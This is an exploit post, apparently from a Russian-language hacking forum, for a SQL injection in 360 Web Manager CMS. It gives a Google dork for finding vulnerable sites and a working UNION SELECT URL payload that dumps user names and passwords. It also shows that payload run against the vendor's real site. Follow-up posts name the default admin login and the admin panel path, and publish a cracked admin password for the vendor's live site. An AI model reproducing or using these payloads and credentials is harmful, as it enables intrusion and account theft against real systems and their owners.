360 Web Manager CMS Remote SQL Injection Vulnerability Author: Ded MustD!e Site: http://www.360webmanager.com/ Google Dork: inurl:"IDFM=" "form.php" Exploit: http://site.com/form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/* Example: http://www.360webmanager.com/form.php?IDM=2&IDSM=24&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/* =))) Details: количество колонок может варьироваться, логин админа всегда "superadmin", админка - http://www.site.com/adm/login.php Добавил на milw0rm: http://www.milw0rm.com/exploits/4944
когда копируешь, пробелы бывает получаются, ты просто пробел из ссылки не убрал, у тебя +from+u%20ser получается, тогда он так и пишет=)))
В теме "Расшифровка хэшей" расшифровали хэш к сайту. Теперь можно войти в админку официалки=))))) http://www.360webmanager.com/adm/ login: superadmin pass: 1320webx